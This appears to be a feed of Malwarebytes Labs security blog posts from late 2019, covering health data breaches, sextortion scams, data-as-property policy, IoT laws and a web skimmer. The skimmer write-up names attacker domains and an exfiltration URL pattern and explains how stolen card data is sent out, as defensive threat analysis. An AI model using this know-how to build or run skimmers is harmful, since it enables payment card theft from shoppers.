Techie Feeds

A week in security (November 25 – December 1)

Malwarebytes - Mon, 12/02/2019 - 16:23

Last week on Malwarebytes Labs, we discussed why the notion of “data as property” may potentially hurt more than help, homed in on sextortion scammers getting more creative, and explored the possible security risks Americans might face if the US changed to universal healthcare coverage.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (November 25 – December 1) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Would ‘Medicare for All’ help secure health data?

Malwarebytes - Tue, 11/26/2019 - 20:30

DISCLAIMER: This post is not partisan, but rather focuses on risk assessment based on history and what threats we are facing in the future. We do not endorse any healthcare plan style in any way, outside of examining its data security risk.

For many folks, the term ‘Healthcare for All’ brings up an array of emotions ranging from concern to happiness, and with the changes that come with this policy, we’re not surprised. However, beyond the usual arguments on this subject, we wanted to ask the question: Are there any security risks we need to be worried about if the United States were to switch to ‘Healthcare for All’ policies?

To clarify, there are many healthcare for all style plans currently on paper, being fine-tuned in Washington and in the minds of politicians.  So, for the purposes of this article, we’re referring to ‘Healthcare for All’ plans that are meant to replace, not supplement, private insurance plans in addition to legislation that prohibits private insurance companies from collecting and/or storing patient data. 

‘Healthcare for All’ data security

To start, we’re going to examine the government’s track record of securing patient data.  Since we aren’t living in a world where ‘Healthcare for All’ exists in our country, we’ll use data security practices concerning and the department that runs it, the Centers for Medicare and Medicaid Services (CMS) to get a sense of how well patient data might be secured by government departments.

The website had a bumpy start back in October of 2013. Numerous issues resulted only a small percentage of patients being able to sign up with the website in the first week.

In an article posted by the Associated Press, as well as independent investigations by the Electric Frontier Foundation (EFF), it was discovered that was sending personal data to third parties by putting personal information in data request headers.

Request header sent to third party advertisers, including personal information. Thanks to

Later, In September 2015, the Department of Health and Human services (HHS) inspector general completed a federal audit of CMS and the website.  Their primary concerns were not about patient information being compromised, but rather the breach of a database called MIDAS that stored a lot of personally identifiable information about users of  Namely that this database had numerous high severity vulnerabilities that needed to be patched and that overall, health officials didn’t utilize best practices across the entire system.

Finally, in 2018, the U.S. Government Accountability Office conducted a survey of the Centers for Medicare and Medicaid Services to assess its ability to protect Medicare data from external entities.

According to HippaJournal.Com:

“The study had three main objectives: To determine the major external entities that collect, store, and share Medicare beneficiary data, to determine whether the requirements for protection of Medicare data align with federal guidance, and to assess CMS oversight of the implementation of those requirements.”

Turns out that while there are some requirements in place to ensure that certain entities are cleared for access to this data, there are some who are not and therefore could abuse the data they gain access to!  There are three main groups that access Medicare beneficiary data, either Medicare Administrative Contractors (MACs), who process Medicare claims, research organizations, and entities that use claims data to assess the performance of Medicare service providers.

Unfortunately, only the processes for clearing access to this data for MACs and service provider entities are in line with federal guidance, which is designed to be used for all CMS contractors.  Researchers, on the other hand, aren’t considered CMS contractors.  Basically, the oversight required by federal regulation on access to this data was previously applied to only 2/3rds of all users who could access that data, so there is no guarantee that the data was fully protected.

While we listed out numerous instances of government controlled patient data being put into compromising positions, reports of lost medical data from government-controlled systems are actually very small. I couldn’t find anything that blamed the CMS or HHS for a data breach.

Private Insurance data security

The luck of not having much, if any, medical data breached despite numerous occasions of unpatched vulnerabilities being identified for and it’s controlling department doesn’t quite extend to the private insurance world.

In July 2019, Premera Blue Cross, an insurance company for the Pacific Northwest of the U.S, agreed to pay a settlement of over $10 million to numerous state offices. Premera suffered a massive data breach that exposed the data of more than 10 million patients in 2015. The press release from the Washington State Office of the Attorney General claims:

“From May 5, 2014 until March 6, 2015, a hacker had unauthorized access to the Premera network containing sensitive personal information, including private health information, Social Security numbers, bank account information, names, addresses, phone numbers, dates of birth, member identification numbers and email addresses.”

In addition to that, there were complaints that Premera mislead consumers about the breach and the full scope of potential damage that could be done.

In October of 2018, an employee with Blue Cross Blue Shield of Michigan lost a laptop that had customer’s personal medical data saved on it.  The company jumped into action and worked with a subsidiary to change the access credentials to the encrypted laptop and to their knowledge, there is no evidence that the patient data was compromised, however, according to CISOMag:

“The access information includes the member’s first name, last name, address, date of birth, enrollee identification number, gender, medication, diagnosis, and provider information. Blue Cross clarified that the Social Security numbers and financial account information were not included in the accessible data.”

Finally, in 2019, Dominion National insurance identified than an unauthorized party may have been able to access internal severs, as early as August 2010! According to a press release:

“Dominion National has undertaken a comprehensive review of the data stored or potentially accessible from those computer servers and has determined that the data may include enrollment and demographic information for current and former members of Dominion National and Avalon vision, as well as individuals affiliated with the organizations Dominion National administers dental and vision benefits for. The servers may have also contained personal information pertaining to plan producers and participating healthcare providers. The information varied by individual, but may include names in combination with addresses, email addresses, dates of birth, Social Security numbers, taxpayer identification numbers, bank account and routing numbers, member ID numbers, group numbers, and subscriber numbers.“

These were three examples of breaches that occurred to actual health insurance companies, not third parties or government-controlled healthcare organizations.  In two of these instances, the attacker maintained a foothold on the network for over a year (9 years in Dominion’s case!) and in another instance, someone just lost a laptop full of patient data (the same thing happened to the Department of Homeland Security & The Department of Health & Human Services over the last few years. We need to just tape our laptops to our bodies like a tourist with a passport!)

Why neither of these is the problem

Okay, so which is it? Is it more secure to entrust our government with control of patient data, or are we in better hands with private insurance companies?  The reality is, neither one matters because neither is the actual problem.

It’s not the organizations that we depend on to protect our data that are being breached as much as the third-party organizations they work with.  From mailing services to labs to billing organizations, most of our patient data breaches are happening to organizations who don’t have any real need to hold on to our data, which may be why they fail to secure it. 

Third party breaches

In September of this year, Detroit-based medical contractor, Wolverine Solutions Group (WSG), was breached, resulting in the possible compromise of hundreds of thousands of patients nationwide. WSG provided mailing, as well as other, services to hospitals and healthcare companies. They were hit by a Ransomware attack which resulted in data that belonged to numerous healthcare organizations patients being ransomed. 

While the investigation into the attack hasn’t resulted in any evidence that data has been stolen, in a quote of WSG President Darryl English in the Detroit Free Press:

“Nevertheless, given the nature of the affected files, some of which contained individual patient information (names, addresses, dates of birth, Social Security numbers, insurance contract information and numbers, phone numbers, and medical information, including some highly sensitive medical information), out of an abundance of caution, we mailed letters to all impacted individuals recommending that they take immediate steps to protect themselves from any potential misuse of their information,”

Despite their belief that no patient data was obtained, the same article by the Detroit Free Press describes the case of Tyler Mayes of Oxford, who has identified numerous fraudulent medical charges on his credit report:

“I haven’t been put under the knife in four years,” he said. “So I had a phantom surgery that not even I knew about? I have received no bills in the mail, and have received no phone calls. I have no emails. They just randomly appeared on my credit report. “I think they’re not letting out as much out of the bag as they’ve got in there,” Mayes said of the Wolverine Solutions Group breach.

In May, Spectrum Health Lakeland started sending out letters to about a thousand of their patients, because their billing services company (OS, Inc) was breached, resulting in the possible theft of patient names, addresses and health insurance providers, but not social security and driver’s license numbers (the bad guys will have to find that somewhere else I guess.)

According to an article for MLive Michigan that covers the breach:

“Billing services company OS, Inc. confirmed Wednesday , May 8, an unauthorized individual accessed an employee’s email account that held information related to some Spectrum Health Lakeland patients, according to a Spectrum Health news release.”

A successful phishing attack against the employees of Solara Medical Supplies, reported in mid-November, lead to a breach that lasted almost a year and resulted in the loss of employee names and potentially addresses, dates of birth, health insurance information, social security numbers, financial and identification information, passwords, PINs and all kinds of other juicy data.

However, a big concern about the breach of employee e-mail accounts for a third-party vendor is the possibility for attackers to use those infected systems as staging areas to launch additional malicious phishing attacks using e-mail addresses from employees of Solara.

Finally, an ongoing investigation by the Securities and Exchange Commission that started May 2019 identified that American Medical Collection Agency (AMCA) was breached for eight months between Aug 2018 and March 2019.

Actual numbers of affected patients are still being worked out, however according to Health IT Security, at least six covered entities have reported that their patient data was compromised by the attack. This includes patient information from 12 million folks who have utilized Quest Diagnostics and 7.7 million Labcorp patients.

“And just this week a sixth provider, Austin Pathology Associates, reported at least 46,500 of its patients were impacted by the event. Shortly after, seven more covered entities reported they too were impacted: Natera, American Esoteric Laboratories, CBLPath, South Texas Dermatopathology, Seacoast Pathology, Arizona Dermatopathology, and Laboratory of Dermatopathology ADX.”

When known affected patients’ tallies are added together, approximately 25 million patients have had their data compromised thanks to this attack. There are still providers who are figuring out the full extent so you can rest assured that the number is likely going to rise.

So, coming back to our original question, it looks like our biggest problem with keeping control of medical data is that it’s spread out all over the place! A ‘Medicare for All’ plan may reduce breaches to some extent because you’ll remove a few companies that could possess the data, however, just based on our own research in this article, often we see greater success by cybercriminals breaching third-party medical vendors than going after government or established insurance companies.

What is being done?

If this is your first-time hearing about the potential dangers of third-party data sharing, don’t fret, because politicians are on it!  A first step in taking action to curb data theft is to establish a department specifically for digital privacy—an idea introduced this month by Rep Anna G. Eshoo [D-CA-18].  The Online Privacy Act of 2019 was introduced to the U.S. House of Representatives in early November.

The purpose of the bill is:

”To provide for individual rights relating to privacy of personal information, to establish privacy and security requirements for covered entities relating to personal information, and to establish an agency to be known as the United States Digital Privacy Agency to enforce such rights and requirements, and for other purposes.”

Online Privacy Act of 2019

There are some politicians who are against this bill and want to continue to have the Federal Trade Commission be the department concerned with digital privacy, however we can see how well that is going.

Beyond just a new department for privacy, Senator Mark R. Warner [D-VA] has called out new legislation on patient data sharing to put in more language about the importance of establishing controls and security in the development of technologies that allow patients greater insight into their Electronic Health Record (EHR). You can read about the legislation called the ACCESS act on our blog as well.

The proposed legislation from the Department of Health and Human Services (HHS) requires insurers participating in CMS-run programs, like Medicare, to allow patients to access their health information electronically. They plan to do this by establishing an Application Programming Interface (API) that third-party vendors can utilize to obtain data and make it viewable to the patient.

Sen. Warner, who has been a huge advocate for privacy and security, wrote a letter to the legislation authors, asking for a serious focus on the security of that API so it’s not abused. In the letter he states:

“…I urge CMS to take additional steps to address the potential for misuse of these features in developing the rules around APIs. In just the last three years, technology providers and policymakers have been unable to anticipate – or preemptively address – the misuse of consumer technology which has had a profound impact across our society and economy. As I have stated repeatedly, third-party data stewardship is a critical component of information security…”

Senator Mark R. Warner [D-VA]

We don’t know what help these efforts will provide in the long run, but we are in a good position to start really discussing the dangers and solutions to problems concerning digital healthcare data, specifically it’s uses and abuse.

The wrap-up

Now that we’ve covered all that, did we answer our question? Does ‘Medicare for All’ have any impact on data security? It looks like the answer is no, regardless of the health plan we use, the data is going to continue to be vulnerable, in large part because of third-party sharing.

Neither the government nor private health insurance have a perfect score when it comes to data security, however both have been affected by third-party breaches.  In the case of private insurance companies, breaches like that at OS, Inc. circumvented all efforts made by Blue Cross and other insurance companies to protect their patient data. At the same time, government health care technology has been riddled with misconfigurations and poor practices that frankly make it a miracle that data hasn’t already been completely harvested by cyber criminals.

The good news is that every attack brings the knowledge of how to avoid one in the future. Our health data is more secure now than any other point of digital healthcare record history, and it’s only going to get better! With the backing of government legislation on the protection of not just medical data, but how it’s transferred and stored, we can turn this whole thing around.

Unfortunately for the millions of patients who have had their personal data stolen and likely stored away in the databases of numerous criminals, and those who are likely going to have to deal with fraud and theft by criminals because of it for the foreseeable future, we are the broken eggs in this security omelet. Let’s hope the next group fare better.

The post Would ‘Medicare for All’ help secure health data? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Sextortion scammers getting creative

Malwarebytes - Tue, 11/26/2019 - 17:09

We’ve covered sextortion before, focusing in on how the core of the threat is an exercise in trust. The threat actor behind the campaign will use whatever information available on the target that causes them to trust that the threat actor does indeed have incriminating information on them. (They don’t.) But as public awareness of the scam grows, threat actors have to pivot to less expected pitches to maintain the same response from victims. Let’s take a look at a recent variant.

As we can see, the technique at hand appears to be peppering the pitch with as many technical terms as possible in order to wear down a victim’s defenses and sell the lie that the threat actor actually hacked them. (NOTE: employing a blizzard of technical vocabulary as quickly as possible is a common technique to sell lies offline, as well as via email.) If we take a closer look, the facade begins to fall away fairly quickly.

  • EternalBlue, RATs, and trojans are all different things
  • Porn sites either don’t allow anonymous user uploads, or scan and monitor those uploads for malicious content
  • The social media data referenced is not stored locally and thus cannot be ‘harvested’ and is largely available on the open web anyway
  • a RAT cannot take a specific action based on what you’re doing in front of an activated camera. How would it know?

Some of these points would be difficult for an average user to realize, but the last two serve as pretty good red flags that the actor in the email is not as sophisticated as he claims. The problem is that by starting the pitch with the most alarming possible outcome, many users are pushed into a panic and don’t stop to consider small details. A key to good defense against sextortion is taking a deep breath, reading the email carefully, and asking yourself – do these claims make sense?

Where did it come from?

Sextortion scammers typically take a shotgun approach to targeting, using compromised or disposable email addresses to send out as many messages as possible. Some variants will attempt to make the pitch more effective by including actual user passwords gleaned from old database breaches. The important thing to remember though, is that the scammers do not have any current information to disclose, because they didn’t actually hack anyone. This is a fairly low effort social engineering attack that remains profitable precisely because the attacker does not have to expend resources actually hacking an end user.

How NOT to get help

The bulk of cyber threats out there are in fact symptoms of human systems failures. Appropriate, responsible infosec responses to these failures give people tools to shore up those systems, thereby ensuring the cyber threat does not claim a foothold to begin with. Less prudent infosec responses, however, do this:

An IP address is the rough online equivalent to a zip code. Could you find where someone whose name you don’t know lives based solely on a zip code? Would you really trust a company who makes grammatical errors in their own Google ads?

Is there anyone in 2019 who genuinely believes it’s possible to keep anything off the Internet? Extraordinary claims require extraordinary evidence, but unfortunately they don’t provide any as their technology is “proprietary.”

It can be very frightening for a user to receive one of these social engineering attempts, particularly if the pitch is loaded with a slew of technical terms they do not understand. But close reading of the email can sometimes reveal red flags indicating the threat actor is not exactly the sharpest hacker out there. Further, the defense against sextortion is one of the cheapest, easiest defenses against cyber threats out there: do nothing. Stay vigilant, and stay safe.

The post Sextortion scammers getting creative appeared first on Malwarebytes Labs.

Categories: Techie Feeds

‘Data as property’ promises fix for privacy problems, but could deepen inequality

Malwarebytes - Mon, 11/25/2019 - 16:00

In mid-November, Democratic presidential hopeful Andrew Yang unveiled a four-prong policy approach to solving some of today’s thornier tech issues, such as widespread misinformation, technology dependence, and data privacy. Americans, Yang proposed, should receive certain, guaranteed protections for how their data is collected, shared, and sold—and if they choose to waive those rights, they should be compensated for it.

This is, as Yang calls it, “data as a property right.” It is the idea that, since technology companies are making billions of dollars off of what the American public feeds them—data in the forms of “likes,” webpage visits, purchase records, location history, friend connections, etc.—the American public should get a cut of that money, too.

Data property supporters in the US argue that, through data payments, Americans could rebalance the relationship they have with the technology industry, giving them more control over their data privacy and putting some extra money in their pockets, should they want it.

But data privacy advocates argue that, if what Americans need are better data privacy rights, then they should get those in an actual data privacy bill. Further, the data property model could harm more people than it helps, disproportionately robbing low-income communities of their data privacy, while also normalizing the idea that privacy is a mere commodity—it’s only worth the sale price we give it.

To some, a data property model would only keep large corporations in control. No sudden wellspring of rights. No rebalance of power.  

Ulises Mejias, associate professor at State University of New York, Oswego, described the data property model in a broader historical context.

“Paying someone for their work is not a magical recipe for eliminating inequality, as two centuries of capitalism have demonstrated,” Mejias said. He said that, like plantation owners and factory owners, modern data-mining companies understand that, to maintain their profit streams, they have to allow some leniency towards those who they profit from—the people.

“So, we will probably start to see more proposals to ‘fix’ the system by paying us for our data, even from ‘progressive’ figures like Yang or [Jaron] Lanier,” Mejias said. “This, however, does not amount to the dismantling of data colonialism. Rather, it is an attempt to make it the new normal.”

He continued: “The surveillance mechanisms would not go away; they would just be paying us to put up with them.”

Data as property

In 2013, the computer scientist Jaron Lanier, who Mejias referenced, published the book Who Owns the World, a forward-looking, philosophical analysis about our relationship with data and the Internet. In the book, Lanier proposed a then-novel idea: People should be paid royalties for the data they create that goes on to benefit other people.

Six years later, Lanier has refined his ideas into the banner of “data dignity.” As he loftily told the New York Times in a video segment, a recording of “Für Elise” buoying his words:

“You should have the moral rights to every bit of data that exists because you exist, now and forever.”

For data property or dignity supporters, owning your data is a first step toward meaningful, tectonic changes: individualized data privacy controls, higher economic returns, and balanced relationships with technology corporations.

Here’s what that society would allow, supporters say.

One, if consumers own their data, they can make decisions about how companies treat it, including how their data is collected and then shared and sold to separate, third parties. By having the option to say “no” to data sharing and selling, consumers could, in effect, say “no” to some of the most common data privacy oversteps today. No more menstrual tracking information shared with Facebook. No more GPS location data aggregated publicly online. Maybe even no more Cambridge Analytica.

Two, the option to sell data could potentially benefit countless Americans with a near-endless revenue stream. Christopher Tonetti, associate professor of economics at Stanford University’s Graduate School of Business, argued in the Wall Street Journal that data is unlike most any other commodity because its value continues after the first point of sale.

“With most goods—think of a plate of sushi or an hour of your doctor’s time—one person’s consumption of the good means there is less to go around. But data is infinitely usable,” Tonetti said. “That means that if consumers could sell their data, they would have the ability to share the data from any transaction with multiple organizations—to their own benefit and that of society as a whole.”

This potential passive, money-making venture gains even more appeal when major political players—like Yang—argue that “our data is now worth more than oil.”

But there’s missing information in that statement, say data privacy advocates. Our data is worth more than oil to who?

Data as property flaws

Curiously absent from the discussions about data property rights are detailed analyses about the actual value of consumer data. Sure, the numbers may show that the data-driven advertising industry has eclipsed the dollar-size of the oil industry, but there is no data analogue for what an oil barrel costs. There’s no going rate for Facebook likes, no agreed-upon exchange rate for Instagram popularity.

Hayley Tsukuyama, legislative analyst at Electronic Frontier Foundation, said that using available numbers does not provide reliable statistics when trying to determine data’s “value.”

“When you look at a sell list of location data, and do some back-of-the-envelope math, where a company paid this much for it, and there’s 50 people on the list, and therefore, their data is worth this—that’s not how it works,” Tsukayama said. She said we similarly cannot track the value of the average Facebook user’s data based on a simplistic equation of dividing the company’s ad revenue by its user base.

Tsukayama also pointed to a bigger problem with the data as property model: Consumers will not be selling their data, so much as they’ll be selling their privacy. And for some types of data, the invasion of privacy will always cost too much, she said.

“My location data may cost a penny to buy, but to me that’s worth no amount of money—there’s no amount of money you could pay me to make me okay with someone knowing my location,” she said.

Chad Marlow, senior advocacy and policy counsel at ACLU, added another problem about data valuation: It’s subjective. A company that sells Legos, he said, would pay more for children’s data, much in the same way that a company that sells cars would pay more for adults’ data.

Taking the example to what he called an extreme, Marlow said:

“My tax returns? Probably not worth so much. Trump’s tax returns? Probably worth a big deal!”

In all these situations—whether its vague data valuation, contextual pricing, or putting a literal price tag on privacy—both Tsukayama and Marlow agreed that some consumers will be harmed more than others.

Much like the pay-for-privacy schemes that have bubbled up in the past year, data property models would enable companies to take advantage of low-income communities that need the extra money. It’s much easier for a middle-class earner to say no to a privacy invasion than it is for stressed, hungry families, Marlow said.

“If you have parents who are struggling to put food on the table—who are eating bread and drinking water for multiple dinners—and you say ‘I will give you money if you sell your data’ and you don’t even say how much, they will say yes immediately,” Marlow said. “Because they cannot afford to say no.”

Finally, the actual money going into consumers’ pockets from a data property model might be a “pittance,” Tsukayama said. She added that, for the consumers who take the money, it isn’t worth the cost to their privacy.

“It’s a particularly pernicious form of privacy nihilism, where someone would say ‘Fine, do what you want, just throw me a little bit back,’” Tsukayama said, imagining a bargain in which consumers are fine with privacy invasions so long as they get a little bit of money.

So, if low-income communities are disproportionately harmed, and if consumers receive pennies, and if the sale of privacy becomes normalized for those pennies, who wins in this model?

According to Marlow, the “data agents”—organizations or companies that will facilitate the sale of consumers’ data to one company and then another company and then another. For every single step of those transactions, Marlow said, each data agent will get a cut of the sale, with consumers further down the line to get their share.

“If you get a cent and they get a nickel, and they do this hundreds of thousands of times, there’s real money to be made for them,” Marlow said.

He said there are already examples of these types of companies. He said he pushed back against one earlier this year, when a data property bill landed in Oregon.

 Data as property legislation

In the past year, the idea to treat data as property has escaped the niche audiences served by papers like the Wall Street Journal and the Harvard Business Review.

It’s now inspired lawmakers across the US.

For US Senators Mark Warner and Josh Hawley, who together introduced the DASHBOARD Act, giving consumers better transparency into the value of their data would better enable consumers to make informed decisions about what tech platforms to use. For Representative Doug Collins of Georgia, who proposed a bill to protect online privacy, giving the American people the right to own their data is a cornerstone to navigating the future economy.

But the clearest legislative push for data property rights landed in Oregon earlier this year in Senate Bill 703. Introduced by one state senator and two representatives, the bill was strongly supported by a company called, a seemingly small shop with the big idea that legal ownership of data property should be the next, universal human right.

In 2018, announced a way to try to provide consumers with that right: its own app, dubbed #My31 (there are currently 30 agreed-upon universal human rights per the United Nations). The app, which focuses strictly on medical data, gives consumers an option to declare how they would like that data to be used, including leasing, sharing, donating, or getting paid for it.

#My31, then, aligned perfectly with SB 703: A bill to allow Oregonians to sell their medical data for money. was far from alone in supporting the bill; many similar companies submitted written testimony for lawmakers to consider. SB 703, the companies said, was a strong step toward protecting consumers’ rights to own and share their medical records as they see fit, potentially enabling them to better develop a comprehensive profile, no matter which hospitals or providers they’d used in the past. Further, some companies said, the ownership of medical data would also allow users to more easily donate that data to medical research.

Marlow saw the bill differently.

“Beware the tech industry’s latest privacy Trojan Horse,” he wrote in March.

“ argues that, insofar as patient data is already being sold, its legislation is merely designed to give consumers ‘ownership’ of their data and a cut of the profits,” Marlow said. “But savvy bill readers will note that the proposed laws contain no defined percentage of the profits patients are entitled to, so they could receive mere pennies of’s revenue in return for giving up their privacy.”

Health Wizz, a company that also lets users control their medical data, wrote in its testimony: “We don’t need more privacy legislation,” but instead, better transparency.

Introduced in January, SB 703 is currently before the state Senate’s Joint Committee on Ways and Means.

Winners and losers

Depending on who you ask, the ability for consumers to own their data will produce one of two winners—consumers or corporations.

According to Mejias, the associate professor at SUNY Oswego, though, there is no reason to expect the data property model to solve our current privacy problems, it will only deepen them:

“The promise of a few more bucks at a time when social support systems are disappearing and inequality is rising would simply re-create an unequal system where those with more means can afford privacy and freedom, and those with less means are subjected to more intrusion, surveillance and quantification, which ultimately perpetuates their position.”

The post ‘Data as property’ promises fix for privacy problems, but could deepen inequality appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (November 18 – 24)

Malwarebytes - Mon, 11/25/2019 - 12:55

Last week on Malwarebytes Labs, we looked at stalkerware’s legal enforcement problem, announced our cooperation with other security vendors and advocacy groups to launch Coalition Against Stalkerware, published our fall 2019 review of exploit kits, looked at how Deepfake on LinkedIn makes for malign interference campaigns, rounded up our knowledge about the Disney+ security and service issues, explained juice jacking, analyzed how a web skimmer phishes credit card data via a rogue payment service platform, and lastly, we looked at upcoming IoT bills and guidelines.

Other cybersecurity news
  • Cybercriminals hitting US city and state governments with ransomware has become increasingly popular in recent times. Again, Louisiana has been targeted. (Source: TechSpot)
  • National Veterinary Associates was hit by a ransomware attack late last month that affected more than half of those properties. (Source: KrebsOnSecuirty)
  • After a deadline was missed for receiving a ransom payment, the group behind Maze Ransomware has published data and files stolen from security staffing firm Allied Universal. (Source: BleepingComputer)
  • A WhatsApp flaw that could let hackers steal users’ chat messages, pictures and private information by letting users download a video file containing malicious code. (Source: The DailyMail UK)
  • A malicious campaign is active that spoofs an urgent update email from Microsoft to infect user’s systems with the Cyborg ransomware. (Source: TechRadar)
  • Microsoft has invested $1 billion in the Elon Musk-founded artificial intelligence venture that plans to mimic the human brain using computers. (Source: Independent UK)
  • Unique data leak contains personal and social information of 1.2 billion people that appear to originate from 2 different data enrichment companies. (Source: DataViper)
  • The US branch of the telecommunications giant T-Mobile disclosed a security breach that, according to the company, impacted a small number of customers of its prepaid service. (Source: SecurityAffairs)
  • A hacker has published more than 2TB of data from the Cayman National Bank. This includes more than 640,000 emails and the data of more than 1400 customers. (Source: HeadLeaks)
  • A ransomware outbreak has besieged a Wisconsin based IT company that provides cloud data hosting, security and access management to more than 100 nursing homes across the United States. (Source: KrebsOnSecuirty)

Stay safe, everyone!

The post A week in security (November 18 – 24) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

IoT bills and guidelines: a global response

Malwarebytes - Fri, 11/22/2019 - 16:27

You may not have noticed, but Internet of Things (IoT) rules and regulations are coming whether manufacturers want them or not. From experience, drafting up laws which are (hopefully) sensible and have some relevance to problems raised by current technology is a time-consuming, frustrating process.

However, it’s not that long since we saw IoT devices go mainstream—right into people’s homes, controlling real-world aspects of their day-to-day lives, and also causing mishaps and serious issues for people dealing with them.

The theoretical IoT wild west may be drawing to a close, so we’re taking a look at some IoT related bills and guidelines currently in the news.

Where did this all begin?

You’ve probably seen articles in the last few days talking about multiple upcoming changes and suggestions for IoT vendors, but in actual fact the first steps were taken last year when California decided the time was ripe for a little bit of IoT regulation.

If you sell or offer IoT devices, which count as any Internet-connected device in California, the device must be equipped with “reasonable security features.”

Bills, bills, bills

Here’s the text of the California bill.

The key parts are these:

“Connected device” means any device, or other physical object that is capable of connecting to the Internet, directly or indirectly, and that is assigned an Internet Protocol address or Bluetooth address.

A connected device is as wide ranging as you’d expect, so that’s a good thing considering anything from your printer to your refrigerator could be communicating with the big wide world outside.

That’s great—but what, exactly, is a reasonable security feature?

Next up:

(b) Subject to all of the requirements of subdivision (a), if a connected device is equipped with a means for authentication outside a local area network, it shall be deemed a reasonable security feature under subdivision (a) if either of the following requirements are met:

(1) The preprogrammed password is unique to each device manufactured.

(2) The device contains a security feature that requires a user to generate a new means of authentication before access is granted to the device for the first time.

We’re essentially in password town. If the shipped password is unique and not something you can plug a serial number into Google to discover, or the device owner is forced to create a unique password the first time they fire it up, that would count as “reasonable security.”

One small step for IoT

Is that enough, though? Some US-based legal eagles suggest it isn’t, and they may well have a point. If IoT legislation doesn’t end up considering things like secure communication, tampering, updates, or even what happens when a device is no longer supported, then this could become messy  quickly.

Even so, cheap devices with zero password functionality built in are commonplace and an absolute curse where trying to secure networks and keep users safe are concerned.

The California bill won’t just apply to devices being sold in California; it doesn’t matter where they’re made. If your password name isn’t down, you’re not getting in—for want of a better and considerably less mangled expression.

This is due to roll into action on the first of January 2020, not only in California but also Oregon. It seems the US is taking the potential for IoT chaos seriously and I’d be amazed if this doesn’t end up going live in additional states in the near future.

Tackling the IoT problem globally

It’s not just the US trying to get a grip on IoT. Australia just pushed out the voluntary code of practice: securing the Internet of Things for consumers [PDF]. Spread across 13 principles, it seems to be significantly more in-depth than the US bill, which so far leaves a lot of areas up for debate. The 13 principles tackle communication security, updates, the ability to easily scrub personal data, and more besides.

Of course, we should temper our expectations somewhat. The US bill goes live in two states only, and there doesn’t seem to be much (or any!) information with regards to punishment, fines, or anything else.

Additionally, you yourself as a consumer can’t do anything off the back of the bill directly. It would have to be the California Attorney General or similar stepping up to the plate. On the other hand, as impressive as the Australian code is—and it is still under consultation—it’s currently only voluntary.

Even so, getting people in a position of authority to think about these issues is important, and at the very least these guides will help people at home to make considered, informed decisions about the technology they allow into their homes on a daily basis. Some good first steps, then, but we have a long way to go.

The post IoT bills and guidelines: a global response appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Web skimmer phishes credit card data via rogue payment service platform

Malwarebytes - Thu, 11/21/2019 - 17:30

Heading into the holiday shopping season, we have been tracking increased activity from a threat group registering domains for skimming and phishing campaigns. While most of the campaigns implemented a web skimmer in the typical fashion—grabbing and exfiltrating data from a merchant’s checkout page to an attacker-controlled server—a new attack scheme has emerged that tricks users into believing they’re using a payment service platform (PSP).

PSPs are quite common and work by redirecting the user from a (potentially compromised) merchant site onto a secure page maintained by the payment processing company. This is not the first time a web skimmer has attempted to interfere with PSPs, but in this case, the attackers created a completely separate page that mimics a PSP.

By blending phishing and skimming together, threat actors developed a devious scheme, as unaware shoppers will leak their credentials to the fraudsters without thinking twice.

Standard skimmer

Over the past few months, we’ve tracked a group that has been active with web skimmer and phishing templates. As web security firm Sucuri noted, most of the domains are registered via the medialand.regru@gmail[.]com email address.

Many of their skimmers are loaded as a fake Google Analytics library called ga.js. One of several newly-registered domain names we came across had a skimmer that fit the same template, hosted at payment-mastercard[.]com/ga.js.

Figure 1: Simple skimmer based on previous template

This malicious ga.js file is injected into compromised online shops by inserting a one line piece of code containing the remote script in Base64 encoded form.

Figure 2: A JavaScript library from a compromised shop injected with the skimmer

However, one thing we noticed is that the payment-mastercard[.]com domain was also hosting a completely different kind of skimmer that at first resembled a phishing site.

Phish-like skimmer

This skimmer is interesting because it looks like a phishing page copied from an official template for CommWeb, a payments acceptance service offered by Australia’s Commonwealth Bank (

Figure 3: Fraudulent and legitimate payment gateways shown side by side

As the text reads “Your details will be sent to and processed by The Commonwealth Bank of Australia and will not be disclosed to the merchant” this is not a login page to phish credentials, but rather a pretend payment gateway service.

The attackers have crafted it specifically for an Australian store running the PrestaShop Content Management System (CMS), exploiting the fact that it accepts payments via the Commonwealth Bank.

Figure 4: Modes of payments accepted by the store

The scheme consists of swapping the legitimate e-banking page with the fraudulent one in order to collect the victims’ credit card details. We also noticed that the fake page did something we don’t always see with standard skimmers in that it checked that all fields were valid and informed the user if they weren’t.

Figure 5: Fake payment gateway page shown with its JavaScript that exfiltrates the data

Here’s how this works:

  • The fraudulent page will collect the credit card data entered by the victim and exfiltrate it via the payment-mastercard[.]com/ga.php?analytic={based64} URL
  • Right after, the victim is redirected to the real payment processor via the merchant’s migs_vpc module (MIGs VPC is an integrated payment service)
  • The legitimate payment site for Australia’s Commonwealth Bank is loaded and displays the total amount due for the purchase.
Figure 6: Web traffic showing data exfiltration process followed by redirect to legitimate PSP

Here’s the final (and legitimate) payment page displayed to the victim. Note how the total amount due from the purchase on the compromised shop is carried over. This is done by creating a unique session ID and reading browser cookies.

Figure 7: Legitimate payment gateway page used for actual payment of goods Web skimming in all different forms

Web skimming is a profitable criminal enterprise that shows no sign of slowing down, sparking authorities’ attention and action plans.

Externalizing payments shifts the burden and risk to the payment company such that even if a merchant site were hacked, online shoppers would be redirected to a different site (i.e. Paypal, MasterCard, Visa gateways) where they could enter their payment details securely.

Unfortunately, fraudsters are becoming incredibly creative in order to defeat those security defenses. By combining phishing-like techniques and inserting themselves in the middle, they can fool everyone.

Malwarebytes users are already protected against this particular scheme as the fraudulent infrastructure was already known to us.

Indicators of Compromise



The post Web skimmer phishes credit card data via rogue payment service platform appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Explained: juice jacking

Malwarebytes - Thu, 11/21/2019 - 16:00

When your battery is dying and you’re nowhere near a power outlet, would you connect your phone to any old USB port? Joyce did, and her mobile phone got infected. How? Through a type of cyberattack called “juice jacking.” Don’t be like Joyce.

Although Joyce and her infected phone are hypothetical, juice jacking is technically possible. The attack uses a charging port or infected cable to exfiltrate data from the connected device or upload malware onto it. The term was first used by Brian Krebs in 2011 after a proof of concept was conducted at DEF CON by Wall of Sheep. When users plugged their phones into a free charging station, a message appeared on the kiosk screen saying:

